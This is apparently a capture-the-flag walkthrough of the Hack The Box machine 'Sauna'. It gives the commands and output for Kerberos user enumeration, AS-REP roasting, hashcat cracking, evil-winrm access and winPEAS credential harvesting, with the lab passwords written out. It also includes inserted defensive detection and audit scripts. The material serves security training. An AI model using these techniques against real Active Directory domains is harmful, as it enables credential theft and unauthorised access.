Sauna

This is a Windows machine from Hack The Box.

# Nmap 7.94 scan initiated Fri Aug 25 01:40:28 2023 as: nmap -sV -sC -oA sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-25 12:40:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-25T12:41:11
|_  start_date: N/A
|_clock-skew: 6h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 25 01:41:59 2023 -- 1 IP address (1 host up) scanned in 91.07 seconds

  • Enumerating SMB on port 445
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)

Domain name is EGOTISTICAL-BANK.LOCAL.

Enumerating shares


└─$ crackmapexec smb 10.10.10.175 --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175 --shares -u '' -p ''
    
[*] completed: 100.00% (1/1)
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\: 
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: STATUS_ACCESS_DENIED
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.175 -u ''                      

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 947
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.1', 'console_scripts', 'smbmap')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1412, in main
    host = [ host for host in share_drives_list.keys() ][0]
                              ^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'

Identified the machine as a domain controller for the domain EGOTISTICAL-BANK.LOCAL.

Try rpcclient


                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ rpcclient 10.10.10.175 -U ''
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ 

Enumerating the web page on port 80, we see a “The Team” section, which gives us possible users.

Identified the users as

  • Fergus Smith
  • Shaun Coins
  • Sophie Driver
  • Hugo Bear
  • Bowie Taylor
  • Steven Kerb

Used ChatGPT to generate possible username formats from those names and saved them to a text file, users.txt, which will serve as the user list.

Searching LDAP to try and get usernames.


┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ 


ldapsearch part 2, but we did not get any usernames.

┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20230825072320.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAOfn+
 BoDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
 AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
 TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 133374218005585776
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1


  • Use a tool called kerbrute to try and identify valid users. You can use it to do a password spray without generating event code 4624, i.e. quietly.
  • Event code 4624: this corresponds to a log entry in the Windows security event log indicating a successful logon. It is a crucial event for forensic analysts and security professionals as it provides evidence of successful logon activity. Monitoring for an unusually high number of 4624 events, especially in a short time frame or from unfamiliar locations, might indicate a potential security concern like brute-force attacks or unauthorized access.
  • Kerbrute can be found at https://github.com/ropnop/kerbrute
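A defender's counterpart to the two bullets above, added here as an example and not part of the original writeup: kerbrute's user enumeration and spraying never produce a 4624, but the KDC still records a 4768 (TGT requested) or 4771 (pre-authentication failed) for every attempt, and the AS-REP roasting step later in this writeup (GetNPUsers.py) leaves a 4768 with Pre-Authentication Type 0 and an RC4 (0x17) ticket encryption type. The script below runs both checks over constructed sample events; the field names are those of the Windows events, while the event data and the thresholds are assumptions for illustration.

```python
"""Triage of Windows Security events 4768 (TGT requested) and 4771
(Kerberos pre-authentication failed) for two behaviours this writeup
exercises: username enumeration / spraying with kerbrute, which never
produces a 4624, and AS-REP roasting with GetNPUsers.py.

Added example (not part of the original writeup). SAMPLE_EVENTS is
constructed data shaped like the EventData fields of 4768/4771;
the thresholds are illustrative assumptions, not Microsoft guidance."""
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos result codes (RFC 4120) as they appear in the Status field.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768: account name does not exist
KDC_ERR_PREAUTH_FAILED = "0x18"       # 4771: wrong password
RC4_HMAC = "0x17"                     # etype 23, the hashcat 18200 target
NO_PREAUTH = "0"                      # Pre-Authentication Type "none"

_T0 = datetime(2023, 8, 25, 6, 39, 0)  # constructed base time


def _ev(secs, event_id, account, client, status, pre_auth="-", etype="-"):
    """Build one constructed event record using the real 4768/4771 field names."""
    return {"TimeCreated": _T0 + timedelta(seconds=secs), "EventID": event_id,
            "TargetUserName": account, "IpAddress": client, "Status": status,
            "PreAuthType": pre_auth, "TicketEncryptionType": etype}


# Constructed sample log: one attacker host (10.10.14.5) guessing names,
# then obtaining an RC4 AS-REP for fsmith without pre-auth; one ordinary
# workstation (10.10.10.20) with a normal logon and a single typo.
SAMPLE_EVENTS = [
    _ev(1, 4768, "fergus.smith", "::ffff:10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    _ev(1, 4768, "f.smith", "::ffff:10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    _ev(2, 4768, "smithf", "::ffff:10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    _ev(2, 4768, "shaun.coins", "::ffff:10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    _ev(3, 4768, "scoins", "::ffff:10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    _ev(4, 4771, "hsmith", "::ffff:10.10.14.5", KDC_ERR_PREAUTH_FAILED),
    _ev(5, 4768, "fsmith", "::ffff:10.10.14.5", "0x0", NO_PREAUTH, RC4_HMAC),
    _ev(6, 4768, "sdriver", "::ffff:10.10.10.20", "0x0", "2", "0x12"),
    _ev(7, 4771, "hbear", "::ffff:10.10.10.20", KDC_ERR_PREAUTH_FAILED),
]


def client_ip(event):
    """Windows logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return event["IpAddress"].removeprefix("::ffff:")


def find_enumeration(events, min_accounts=5, window=timedelta(minutes=5)):
    """Return {client: sorted account names} for clients that failed against
    at least `min_accounts` distinct names inside `window`: unknown
    principals (4768/0x6) are name guessing, bad pre-auth (4771/0x18) across
    many names is a spray. Neither path ever emits a 4624."""
    failures = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4768 and e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN) or \
           (e["EventID"] == 4771 and e["Status"] == KDC_ERR_PREAUTH_FAILED):
            failures[client_ip(e)].append((e["TimeCreated"], e["TargetUserName"]))
    flagged = {}
    for client, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            names = {name for ts, name in attempts[i:] if ts - start <= window}
            if len(names) >= min_accounts:
                flagged[client] = sorted(names)
                break
    return flagged


def find_asrep_roast(events):
    """Accounts granted a TGT with no pre-authentication and an RC4 AS-REP:
    exactly the material GetNPUsers.py collects for DONT_REQ_PREAUTH accounts.
    A normal password logon shows Pre-Authentication Type 2 instead."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["Status"] == "0x0"
                   and e["PreAuthType"] == NO_PREAUTH
                   and e["TicketEncryptionType"] == RC4_HMAC})


if __name__ == "__main__":
    for client, names in find_enumeration(SAMPLE_EVENTS).items():
        print(f"[enumeration/spray] {client}: {len(names)} names, e.g. {names[:3]}")
    for account in find_asrep_roast(SAMPLE_EVENTS):
        print(f"[AS-REP roast] RC4 AS-REP issued without pre-auth for {account}")
```

The workstation's single 4771 stays below the threshold, so a user mistyping a password is not reported, while the attacker host trips the distinct-name count after a handful of guesses. The two checks need 4768/4771 auditing (Audit Kerberos Authentication Service) enabled on the domain controller.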

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ chmod +x kerbrute                    
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ls
kerbrute  sauna.gnmap  sauna.nmap  sauna.xml  users.txt
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]

  • Using kerbrute
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute userenum --dc 10.10.10.175 -d  EGOTISTICAL-BANK.LOCAL users.txt    

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop

2023/08/25 06:39:06 >  Using KDC(s):
2023/08/25 06:39:06 >   10.10.10.175:88

2023/08/25 06:39:07 >  [+] VALID USERNAME:       [email protected]
2023/08/25 06:39:07 >  [+] VALID USERNAME:       [email protected]
2023/08/25 06:39:08 >  Done! Tested 57 usernames (2 valid) in 1.870 seconds
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ 

Use Impacket

                                                                                                                            
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ls                                          
addcomputer.py     getArch.py          kintercept.py         ntfs-read.py      rpcdump.py      smbserver.py
atexec.py          Get-GPPPassword.py  lookupsid.py          ntlmrelayx.py     rpcmap.py       sniffer.py
changepasswd.py    GetNPUsers.py       machine_role.py       ping6.py          sambaPipe.py    sniff.py
dcomexec.py        getPac.py           mimikatz.py           ping.py           samrdump.py     split.py
dpapi.py           getST.py            mqtt_check.py         psexec.py         secretsdump.py  ticketConverter.py
DumpNTLMInfo.py    getTGT.py           mssqlclient.py        raiseChild.py     services.py     ticketer.py
esentutl.py        GetUserSPNs.py      mssqlinstance.py      rbcd.py           smbclient.py    tstool.py
exchanger.py       goldenPac.py        net.py                rdp_check.py      smbexec.py      wmiexec.py
findDelegation.py  karmaSMB.py         netview.py            registry-read.py  smbpasswd.py    wmipersist.py
GetADUsers.py      keylistattack.py    nmapAnswerMachine.py  reg.py            smbrelayx.py    wmiquery.py

Use the Impacket script GetNPUsers.py. This is a tool from the Impacket suite, designed to exploit a misconfiguration in Active Directory (accounts with Kerberos pre-authentication disabled) that lets an attacker retrieve crackable AS-REP hashes for valid usernames from a domain without having any account credentials initially.
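The misconfiguration GetNPUsers.py looks for is the DONT_REQ_PREAUTH bit (0x400000) in an account's userAccountControl, which is what the "doesn't have UF_DONT_REQUIRE_PREAUTH set" message below refers to. As an added example (not from the writeup or from Impacket), here is how a defender would audit a directory extract for that bit and decode the flag word; the account records are constructed, while the flag values and the LDAP matching-rule filter are the documented ones.

```python
"""Audit of the Active Directory misconfiguration GetNPUsers.py looks for:
accounts whose userAccountControl has DONT_REQ_PREAUTH (0x400000) set, so
the KDC hands out an AS-REP encrypted with the account's password-derived
key to anyone who knows the username.

Added example (not part of the original writeup or of Impacket). The
entries below are constructed records in the shape an LDAP client would
return for sAMAccountName / userAccountControl; the flag values are the
documented userAccountControl (ADS_USER_FLAG) bits."""

# userAccountControl bits, low to high.
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# LDAP filter that asks the directory for the same thing server-side.
# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND extensible match.
PREAUTH_EXEMPT_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH}))"
)

# Constructed directory extract. Administrator's value matches the
# 00010200 the DCSync output later in this writeup reports for that account.
SAMPLE_USERS = [
    {"sAMAccountName": "Administrator",  "userAccountControl": 0x10200},
    {"sAMAccountName": "fsmith",         "userAccountControl": 0x410200},
    {"sAMAccountName": "svc_loanmgr",    "userAccountControl": 0x10200},
    {"sAMAccountName": "old_contractor", "userAccountControl": 0x400202},
]


def decode_uac(value):
    """Names of the set bits, lowest first; mirrors the '( NORMAL_ACCOUNT
    DONT_EXPIRE_PASSWD )' rendering that tools like mimikatz print."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def preauth_exempt(users):
    """Accounts the KDC will serve an AS-REP for without pre-authentication.
    Disabled accounts are still listed: they cannot be roasted today, but
    re-enabling one silently re-opens the hole."""
    findings = []
    for u in users:
        uac = u["userAccountControl"]
        if uac & DONT_REQ_PREAUTH:
            findings.append({"account": u["sAMAccountName"],
                             "enabled": not (uac & ACCOUNTDISABLE),
                             "flags": decode_uac(uac)})
    return findings


if __name__ == "__main__":
    print("LDAP filter:", PREAUTH_EXEMPT_FILTER)
    for f in preauth_exempt(SAMPLE_USERS):
        state = "ENABLED" if f["enabled"] else "disabled"
        print(f"{f['account']:<16} {state:<9} {' '.join(f['flags'])}")
```

Against a live domain the same filter can be fed to ldapsearch (with the bind the page used) or to Get-ADUser -LDAPFilter; the fix for each finding is to clear the bit (Set-ADAccountControl -DoesNotRequirePreAuth $false) and, where an application genuinely needs pre-authentication off, to give that account a long random password so the AS-REP is not crackable with a wordlist like rockyou.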

Using GetNPUsers.py. But first we have to add the target to the hosts file.

Tried GetNPUsers.py on administrator and fsmith.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate administrator, getting its TGT
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

On fsmith:


┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate fsmith, getting its TGT
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$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
                                                                                                                            
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

We have the hash, and now we use hashcat to try and crack it.

Used the commands

./hashcat --example-hashes | grep asrep

./hashcat --example-hashes | less 

then searched for asrep inside less with /asrep

We get hash mode 18200.

Hash mode #18200
  Name................: Kerberos 5, etype 23, AS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

Copy the hash into a file called sauna


└─$ cat sauna         
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$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
                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ 

Run hashcat


                                                                                                                            
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/Sauna/sauna /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

Get the password – Thestrokes23



[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$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:Thestrokes23

Run crackmapexec


┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec smb 10.10.10.175 --shares -u fsmith -p Thestrokes23
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
SMB         10.10.10.175    445    SAUNA            [+] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share 
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6                 We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share 

Try crackmapexec winrm (Windows Remote Management), which will tell us if we can get a shell on the box, which it does.


┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23 
SMB         10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP        10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

We use evil-winrm


┌──(kali㉿kali)-[/usr/bin]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd..
*Evil-WinRM* PS C:\Users\FSmith> ls


    Directory: C:\Users\FSmith


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020  10:01 AM                Desktop
d-r---        1/24/2020  10:40 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/25/2023  12:24 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
d3e2c4cf72ed6d184ea0905f9f67ef1d
*Evil-WinRM* PS C:\Users\FSmith\Desktop> 

Upload and run winPEAS


Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/winPEASx64.exe
                                        
Info: Uploading /home/kali/HTB/Sauna/winPEASx64.exe to C:\Users\FSmith\Documents\winPEASx64.exe
                                        
Data: 3183956 bytes of 3183956 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEASx64.exe

The following credentials are of interest:


╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Check the domain user


*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 4:48:31 PM
Password expires             Never
Password changeable          1/25/2020 4:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

We go for BloodHound.

First we install BloodHound.

┌──(kali㉿kali)-[~]
└─$ sudo apt install bloodhound    
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 


Download SharpHound.exe from GitHub: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

Upload SharpHound and run it from the Windows machine.


*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/SharpHound.exe
                                        
Info: Uploading /home/kali/HTB/Sauna/SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
                                        
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe
2023-08-25T13:19:26.1522551-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-08-25T13:19:26.3241396-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:26.3553912-07:00|INFORMATION|Initializing SharpHound at 1:19 PM on 8/25/2023
2023-08-25T13:19:26.5429038-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL

2023-08-25T13:19:50.6366275-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:50.8397517-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2023-08-25T13:19:50.9022664-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-08-25T13:19:50.9022664-07:00|INFORMATION|LDAP channel closed, waiting for consumers


Download the zip file.

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls


    Directory: C:\Users\FSmith\Documents


